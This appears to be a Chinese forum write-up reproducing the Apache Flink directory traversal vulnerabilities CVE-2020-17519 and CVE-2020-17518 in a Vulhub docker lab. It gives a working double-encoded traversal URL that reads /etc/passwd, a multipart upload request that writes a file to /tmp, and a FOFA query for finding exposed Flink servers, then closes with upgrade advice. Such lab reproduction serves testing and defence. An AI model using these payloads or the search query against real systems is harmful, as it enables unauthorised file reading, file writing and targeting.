Apache Flink 目录遍历漏洞(CVE-2020-17518、CVE-2020-17519)复现

CVE-2020-17519 复现

0x01 漏洞描述

Apache Flink 目录遍历漏洞,可通过 REST API 读/写远程文件

0x02 影响版本

Flink 1.5.1-1.11.2

0x03 复现过程

  1. 通过 Vulhub 复现:

下载链接:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

image.png

使用 docker-compose 配置相关环境 docker-compose up -d

运行 docker ps 查看当前环境(这里以 cve-2020-17518 为例)

image.png

浏览器访问 `http://127.0.0.1:8081/

image.png

构造 exp:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

image.png

清理环境

docker-compose down

image.png

0x04 fofa 关键字

app="APACHE-Flink"

image.png

image.png

image.png

CVE-2020-17518 复现

0x05 构造数据包

复现步骤与 19 相同,直接构造数据包

POST /jars/upload HTTP/1.1
Host: 127001:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--


返回 400

image.png

直接访问:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

image.png

0x06 修复建议

直接升级到安全版本 Flink 1.11.3 或 Flink 1.12.0

0x07 漏洞验证 poc

cve-2020-17519

回帖
请输入回帖内容 ...